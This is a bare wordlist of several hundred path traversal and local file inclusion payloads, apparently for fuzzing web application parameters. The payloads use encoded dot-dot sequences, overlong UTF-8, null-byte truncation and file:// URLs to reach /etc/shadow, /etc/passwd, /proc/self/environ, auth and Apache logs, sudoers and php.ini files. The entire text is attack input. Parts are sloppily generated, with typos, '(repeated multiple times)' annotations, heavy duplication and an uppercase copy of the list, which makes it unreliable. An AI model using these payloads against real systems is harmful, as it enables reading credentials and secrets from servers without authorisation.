index
html
home
page
incliude
web
configure
index.php%00
html.php%00
home.php%00
page.php%00
incliude.php%00
web.php&00
/etc/passwd
/var/log/auth
../etc/passwd
/home/user/etc/passwd
/root/etc/passwd
/var/www/html/etc/passwd
/usr/local/etc/passwd
/opt/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/resolv.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/nginx/nginx.conf
/etc/apache2/apache2.conf
/etc/php.ini
/etc/mysql/my.cnf
/etc/redis.conf
/etc/crontab
/etc/passwd.bak
/etc/shadow.bak
/etc/group.bak
/etc/hosts.bak
/etc/resolv.conf.bak
/etc/ssh/ssh_config.bak
/etc/ssh/sshd_config.bak
/etc/nginx/nginx.conf.bak
/etc/apache2/apache2.conf.bak
/etc/php.ini.bak
/etc/mysql/my.cnf.bak
/etc/redis.conf.bak
/etc/crontab.bak
../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
....//....//....//....//var//log//auth
....//....//....//....//var//log//auth.log
....//....//....//....//....//etc//passwd
file:///../../../../../../etc/passwd
file:////../../../../../../etc/passwd
file:////../../../../../../../var/log/auth
file:///auth.log
file:///auth
file:///index
file:///index.php
file:///etc/passwd
file:///etc/hosts
../../../../../../../proc/self/environ
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
../../../../../../../var/log/apache2/access.log
..//..//..//..//..//..//..//var//log//apache2//access.log
file:////var/log/apache2/access.log
file:///proc/self/environ
../../../../../../../proc/self/environ
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
../etc/passwd
../../../../../../etc/passwd
../../../../../var/log/auth
../../../../../var/log/auth.log
....//....//etc//passwd
....//....//....//var//log//auth
....//....//....//var//log//auth.log
....//....//....//etc//passwd
file:///etc/passwd
file:///var/log/auth
file:///var/log/auth.log
file:///index.php
file:////var/log/apache2/access.log
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%252e%252e%252fetc%252fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/shadow
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%afetc%c0%afshadow
%252e%252e%252fetc%252fshadow
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/hosts
%00../../../etc/passwd
%00../../../var/log/auth
../../../../../../../../../proc/self/environ
..//..//..//..//..//proc//self//environ
%00/etc/passwd
%00/var/log/auth.log
index.php%00
html.php%00
home.php%00
web.php%00
include.php%00
index%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fvar%252fpasswd
file://etc/passwd%00
file://../../../../etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%5c%5c%2e%2e%5c%5c%2e%2e%5c%5c%2e%2e%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cvar%5clog%5cauth.log
../%00../etc/passwd
%00..%00..%00..%00etc%00passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd
../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
%252fetc%252fpasswd
%00../../../../../../etc/shadow
%00/var/log/auth
%00../../etc/passwd
file://localhost/etc/passwd
%00file:///etc/passwd
....//....//....//proc//self//environ
....//....//....//var//log//auth
%252e%252e%252fetc%252fpasswd
..//..//..//..//proc//self//environ
file:///../../../../../../../proc/self/environ
%00file:///var/log/auth.log
../../../../../../../../etc/passwd
../../../../../../../../var/log/auth
file:///var/log/auth.log
file:////proc/self/environ
%252e%252e%252f%252e%252e%252fpasswd
%252fvar%252flog%252fauth.log
%252fvar%252flog%252fapache2%252faccess.log
file://../../../../../../../var/log/apache2/access.log
%252fproc%252fself%252fenviron
%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron
%252e%252e%252f%252e%252e%252fvar%252fpasswd
%c0%ae%c0%ae%c0%afvar%c0%aflog%c0%afauth
%c0%ae%c0%ae%c0%afproc%c0%afself%c0%afenviron
%00../../../../../../proc/self/environ
%00../../../../../proc/self/environ
%00../../../../../../../../../var/log/apache2/access.log
%00../../../var/log/apache2/access.log
%00../../../../etc/shadow
file:////../../../../../../../../etc/passwd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%252fproc%252fself%252fenviron
%252fvar%252flog%252fauth.log
%252e%252e%252f%252e%252e%252fproc%252fself%252fenviron
%252fetc%252fshadow
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
....//....//proc//self//environ
file:///etc/hosts
....//....//etc//shadow
file:////../../../../../../../../../etc/shadow
%2e%2e/%2e%2e/%2e%2e/etc/hosts
%00../../../../etc/hosts
file:////etc/shadow
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fshadow
%c0%ae%c0%ae%c0%afproc%c0%afself%c0%afenviron
%00../../../proc/self/environ
file:////var/log/apache2/access.log
file:////proc/self/environ
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%c0%afetc%c0%afpasswd
/%00../etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc%5cpasswd
%00../../../../../../../../../etc/shadow
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afshadow
%252e%252e%252f%252e%252e%252fpasswd
file:////../../../../../proc/self/environ
%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
%00../../../../../../../etc/shadow
%c0%ae%c0%ae%c0%afvar%c0%aflog%c0%afapache2
../../../../../../../../../../etc/hosts
%2e%2e%252f%2e%2e%252f%2e%2e%252fproc%252fself%252fenviron
file://..%252fetc%252fpasswd
../../../../../proc/self/environ
file:////var/log/auth
../../../../../../../../../etc/shadow%00
../../../../../../../../../../var/log/auth
../../../../../var/log/auth.log%00
../../../../../var/log/apache2/error.log
file://///proc/self/environ
file://../../../../../../../../../etc/hosts
../../../../../../../var/log/syslog
file://../../../../../proc/self/environ
file:///proc/sys/kernel/random/uuid
../../../../../../../var/run/utmp
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../var/spool/mail/root%00
../../../../../../../etc/passwd%00
../../../../../var/log/messages%00
../../../../../../../proc/kmsg
../../../../../../../var/log/dmesg
file://../../../../../../../var/log/lastlog
../../../../../var/log/wtmp%00
../../../../../../../../../var/lib/dpkg/status
../../../../../../../../../../etc/crontab%00
../../../../../../../../../usr/share/doc/apache2/changelog.Debian.gz
../../../../../var/log/tallylog%00
file:///var/spool/cron/crontabs/root
../../../../../proc/self/mountinfo
../../../../../../../../../../../../etc/sudoers%00
../../../../../../../../../etc/network/interfaces
../../../../../../../../../../../../etc/fstab%00
file://../../../../../etc/default/grub
../../../../../../../../../proc/cpuinfo
../../../../../../../../../../../../proc/cmdline%00
file:///proc/mounts%00
/index.php
/html.php
/home.php
/page.php
/include.php
/web.php
/etc/passwd
/var/log/auth
/var/log/auth.log
../etc/passwd
../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
../../../../../../../../../var/log/apache2/access.log
../etc/hosts
../../../../../../../proc/self/environ
./etc/passwd
./var/log/auth
./var/log/auth.log
./etc/hosts
./proc/self/environ
./var/log/apache2/access.log
.././etc/passwd
.././var/log/auth
.././var/log/auth.log
.././etc/hosts
.././proc/self/environ
.././var/log/apache2/access.log
../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../etc/hosts
../../../../../../../../../proc/self/environ
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth  
/configure
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron
file:///etc/passwd
file:///var/log/auth
file:///var/log/auth.log
file:///etc/hosts
file:///proc/self/environ
file:///var/log/apache2/access.log
../../../../../../etc/passwd (repeated multiple times)
../../../../../../../../../var/log/auth (repeated multiple times)
../../../../../../../../../var/log/auth.log (repeated multiple times)
../../../../../../../../../var/log/apache2/access.log (repeated multiple times)
../../../../../../../../../etc/hosts (repeated multiple times)
../../../../../../../../../proc/self/environ (repeated multiple times)
.././etc/passwd
../../../../../../etc/passwd/../../../../../../etc/passwd
../../../../../../../../../var/log/auth/../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log/../../../../../../../../../var/log/auth.log
../../../../../../../../../var/log/apache2/access.log/../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../etc/hosts/../../../../../../../../../etc/hosts
../../../../../../../../../proc/self/environ/../../../../../../../../../proc/self/environ
%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd
../../../../../../../configure
../../../../../../../../../configure
%252fetc%252fconfigure
%00../../../../../../configure
%00/configure
%00../../configure
file://configure
%00file:///etc/passwd
....//....//....//....//....//configure
configure
INDEX
HTML
HOME
PAGE
INCLIUDE
WEB
CONFIGURE
INDEX.PHP%00
HTML.PHP%00
HOME.PHP%00
PAGE.PHP%00
INCLIUDE.PHP%00
WEB.PHP&00
/ETC/PASSWD
/VAR/LOG/AUTH
../ETC/PASSWD
/HOME/USER/ETC/PASSWD
/ROOT/ETC/PASSWD
/VAR/WWW/HTML/ETC/PASSWD
/USR/LOCAL/ETC/PASSWD
/OPT/ETC/PASSWD
/ETC/SHADOW
/ETC/GROUP
/ETC/HOSTS
/ETC/RESOLV.CONF
/ETC/SSH/SSH_CONFIG
/ETC/SSH/SSHD_CONFIG
/ETC/NGINX/NGINX.CONF
/ETC/APACHE2/APACHE2.CONF
/ETC/PHP.INI
/ETC/MYSQL/MY.CNF
/ETC/REDIS.CONF
/ETC/CRONTAB
/ETC/PASSWD.BAK
/ETC/SHADOW.BAK
/ETC/GROUP.BAK
/ETC/HOSTS.BAK
/ETC/RESOLV.CONF.BAK
/ETC/SSH/SSH_CONFIG.BAK
/ETC/SSH/SSHD_CONFIG.BAK
/ETC/NGINX/NGINX.CONF.BAK
/ETC/APACHE2/APACHE2.CONF.BAK
/ETC/PHP.INI.BAK
/ETC/MYSQL/MY.CNF.BAK
/ETC/REDIS.CONF.BAK
/ETC/CRONTAB.BAK
../../../../../../ETC/PASSWD
../../../../../../../../../VAR/LOG/AUTH
../../../../../../../../../VAR/LOG/AUTH.LOG
....//....//....//....//VAR//LOG//AUTH
....//....//....//....//VAR//LOG//AUTH.LOG
....//....//....//....//....//ETC//PASSWD
FILE:///../../../../../../ETC/PASSWD
FILE:////../../../../../../ETC/PASSWD
FILE:////../../../../../../../VAR/LOG/AUTH
FILE:///AUTH.LOG
FILE:///AUTH
FILE:///INDEX
FILE:///INDEX.PHP
FILE:///ETC/PASSWD
FILE:///ETC/HOSTS
../../../../../../../PROC/SELF/ENVIRON
..//..//..//..//..//..//..//PROC//SELF//ENVIRON
FILE:///PROC/SELF/ENVIRON
../../../../../../../VAR/LOG/APACHE2/ACCESS.LOG
..//..//..//..//..//..//..//VAR//LOG//APACHE2//ACCESS.LOG
FILE:////VAR/LOG/APACHE2/ACCESS.LOG
FILE:///PROC/SELF/ENVIRON
../../../../../../../PROC/SELF/ENVIRON
..//..//..//..//..//..//..//PROC//SELF//ENVIRON
FILE:///PROC/SELF/ENVIRON
../ETC/PASSWD
../../../../../../ETC/PASSWD
../../../../../VAR/LOG/AUTH
../../../../../VAR/LOG/AUTH.LOG
....//....//ETC//PASSWD
....//....//....//VAR//LOG//AUTH
....//....//....//VAR//LOG//AUTH.LOG
....//....//....//ETC//PASSWD
FILE:///ETC/PASSWD
FILE:///VAR/LOG/AUTH
FILE:///VAR/LOG/AUTH.LOG
FILE:///INDEX.PHP
FILE:////VAR/LOG/APACHE2/ACCESS.LOG
..//..//..//..//..//..//..//PROC//SELF//ENVIRON
FILE:///PROC/SELF/ENVIRON
%2E%2E%2F%2E%2E%2F%2E%2E%2FETC%2FPASSWD
%2E%2E/%2E%2E/%2E%2E/ETC/PASSWD
%252E%252E%252FETC%252FPASSWD
%2E%2E/%2E%2E/%2E%2E/ETC/SHADOW
%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFETC%C0%AFPASSWD
%C0%AE%C0%AE%C0%AFETC%C0%AFSHADOW
%252E%252E%252FETC%252FSHADOW
%252E%252E%252F%252E%252E%252FETC%252FPASSWD
%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/ETC/PASSWD
../../../../../../../../../ETC/PASSWD%00
../../../../../../../../../ETC/HOSTS
%00../../../ETC/PASSWD
%00../../../VAR/LOG/AUTH
../../../../../../../../../PROC/SELF/ENVIRON
..//..//..//..//..//PROC//SELF//ENVIRON
%00/ETC/PASSWD
%00/VAR/LOG/AUTH.LOG
INDEX.PHP%00
HTML.PHP%00
HOME.PHP%00
WEB.PHP%00
INCLUDE.PHP%00
INDEX%00
%252E%252E%252F%252E%252E%252F%252E%252E%252FVAR%252FPASSWD
FILE://ETC/PASSWD%00
FILE://../../../../ETC/PASSWD
%2E%2E%5C%2E%2E%5C%2E%2E%5CETC%5CPASSWD
%5C%5C%2E%2E%5C%5C%2E%2E%5C%5C%2E%2E%5CPASSWD
%2E%2E%5C%2E%2E%5C%2E%2E%5CVAR%5CLOG%5CAUTH.LOG
../%00../ETC/PASSWD
%00..%00..%00..%00ETC%00PASSWD
%252E%252E%252F%252E%252E%252F%252E%252E%252FPASSWD
../../../../../../../VAR/LOG/AUTH
../../../../../../../../../VAR/LOG/AUTH.LOG
%252FETC%252FPASSWD
%00../../../../../../ETC/SHADOW
%00/VAR/LOG/AUTH
%00../../ETC/PASSWD
FILE://LOCALHOST/ETC/PASSWD
%00FILE:///ETC/PASSWD
....//....//....//PROC//SELF//ENVIRON
....//....//....//VAR//LOG//AUTH
%252E%252E%252FETC%252FPASSWD
..//..//..//..//PROC//SELF//ENVIRON
FILE:///../../../../../../../PROC/SELF/ENVIRON
%00FILE:///VAR/LOG/AUTH.LOG
../../../../../../../../ETC/PASSWD
../../../../../../../../VAR/LOG/AUTH
FILE:///VAR/LOG/AUTH.LOG
FILE:////PROC/SELF/ENVIRON
%252E%252E%252F%252E%252E%252FPASSWD
%252FVAR%252FLOG%252FAUTH.LOG
%252FVAR%252FLOG%252FAPACHE2%252FACCESS.LOG
FILE://../../../../../../../VAR/LOG/APACHE2/ACCESS.LOG
%252FPROC%252FSELF%252FENVIRON
%2E%2E%2F%2E%2E%2F%2E%2E%2FPROC%2FSELF%2FENVIRON
%252E%252E%252F%252E%252E%252FVAR%252FPASSWD
%C0%AE%C0%AE%C0%AFVAR%C0%AFLOG%C0%AFAUTH
%C0%AE%C0%AE%C0%AFPROC%C0%AFSELF%C0%AFENVIRON
%00../../../../../../PROC/SELF/ENVIRON
%00../../../../../PROC/SELF/ENVIRON
%00../../../../../../../../../VAR/LOG/APACHE2/ACCESS.LOG
%00../../../VAR/LOG/APACHE2/ACCESS.LOG
%00../../../../ETC/SHADOW
FILE:////../../../../../../../../ETC/PASSWD
%C0%AE%C0%AE%C0%AFETC%C0%AFPASSWD
%252FPROC%252FSELF%252FENVIRON
%252FVAR%252FLOG%252FAUTH.LOG
%252E%252E%252F%252E%252E%252FPROC%252FSELF%252FENVIRON
%252FETC%252FSHADOW
%2E%2E/%2E%2E/%2E%2E/%2E%2E/ETC/HOSTS
%2E%2E/%2E%2E/%2E%2E/ETC/PASSWD
FILE://%2E%2E/%2E%2E/%2E%2E/%2E%2E/ETC/PASSWD
../..%00/ETC/PASSWD
../..%00/VAR/LOG/AUTH.LOG
....//....//....//VAR//LOG//AUTH
....//....//....//VAR//LOG//AUTH.LOG
....//....//....//ETC//PASSWD
....//....//....//ETC//SHADOW
..%2F..%2F..%2F..%2FVAR%2FLOG%2FAUTH.LOG
..%2F..%2F..%2F..%2FVAR%2FLOG%2FAPACHE2%2FACCESS.LOG
.../..%00/VAR/LOG/AUTH
../../../../../../../etc/php/5.6/apache2/php.ini
../../../../../../../etc/php/5.6/cli/php.ini
../../../../../../../etc/php/7.0/apache2/php.ini
../../../../../../../etc/php/7.0/cli/php.ini
../../../../../../../etc/php/7.1/apache2/php.ini
../../../../../../../etc/php/7.1/cli/php.ini
../../../../../../../etc/php/7.2/apache2/php.ini
../../../../../../../etc/php/7.2/cli/php.ini
../../../../../../../etc/php/7.3/apache2/php.ini
../../../../../../../etc/php/7.3/cli/php.ini
../../../../../../../etc/php/7.4/apache2/php.ini
../../../../../../../etc/php/7.4/cli/php.ini
../../../../../../../etc/php/8.0/apache2/php.ini
../../../../../../../etc/php/8.0/cli/php.ini
../../../../../../../etc/php/8.1/apache2/php.ini
../../../../../../../etc/php/8.1/cli/php.ini
../../../../../../../etc/php/8.2/apache2/php.ini
../../../../../../../etc/php/8.2/cli/php.ini
....//....//etc//php//5.6//apache2//php.ini
....//....//etc//php//5.6//cli//php.ini
....//....//etc//php//7.0//apache2//php.ini
....//....//etc//php//7.0//cli//php.ini
....//....//etc//php//7.1//apache2//php.ini
....//....//etc//php//7.1//cli//php.ini
....//....//etc//php//7.2//apache2//php.ini
....//....//etc//php//7.2//cli//php.ini
....//....//etc//php//7.3//apache2//php.ini
....//....//etc//php//7.3//cli//php.ini
....//....//etc//php//7.4//apache2//php.ini
....//....//etc//php//7.4//cli//php.ini
....//....//etc//php//8.0//apache2//php.ini
....//....//etc//php//8.0//cli//php.ini
....//....//etc//php//8.1//apache2//php.ini
....//....//etc//php//8.1//cli//php.ini
....//....//etc//php//8.2//apache2//php.ini
....//....//etc//php//8.2//cli//php.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f5.6%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f5.6%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.0%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.0%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.1%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.1%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.2%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.2%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.3%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.3%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.4%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.4%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.0%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.0%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.1%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.1%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.2%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.2%2fcli%2fphp.ini
../../../../../../../../etc/php/5.6/fpm/php.ini
../../../../../../../../etc/php/7.0/fpm/php.ini
../../../../../../../../etc/php/7.1/fpm/php.ini
../../../../../../../../etc/php/7.2/fpm/php.ini
../../../../../../../../etc/php/7.3/fpm/php.ini
../../../../../../../../etc/php/7.4/fpm/php.ini
../../../../../../../../etc/php/8.0/fpm/php.ini
../../../../../../../../etc/php/8.1/fpm/php.ini
../../../../../../../../etc/php/8.2/fpm/php.ini
....//....//etc//php//5.6//fpm//php.ini
....//....//etc//php//7.0//fpm//php.ini
....//....//etc//php//7.1//fpm//php.ini
....//....//etc//php//7.2//fpm//php.ini
....//....//etc//php//7.3//fpm//php.ini
....//....//etc//php//7.4//fpm//php.ini
....//....//etc//php//8.0//fpm//php.ini
....//....//etc//php//8.1//fpm//php.ini
....//....//etc//php//8.2//fpm//php.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f5.6%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.0%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.1%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.2%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.3%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.4%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.0%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.1%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.2%2ffpm%2fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f5.6%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.0%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.1%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.2%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.3%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.4%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f8.0%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f8.1%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f8.2%252ffpm%252fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00
%2e%2e%2f%2e%2e%2fetc%2fpasswd%00
../../../../../../../../../etc/passwd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00
%2e%2e%2f%2e%2e%2fetc%2fhosts%00
../../../../../../../../../etc/hosts%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow%00
../../../../../../../../../etc/shadow%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth.log%00
../../../../../../../../../var/log/auth.log%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fssh%2fsshd_config%00
../../../../../../../../../etc/ssh/sshd_config%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fapache2%2fapache2.conf%00
../../../../../../../../../etc/apache2/apache2.conf%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.4%2fapache2%2fphp.ini%00
../../../../../../../../../etc/php/7.4/apache2/php.ini%00
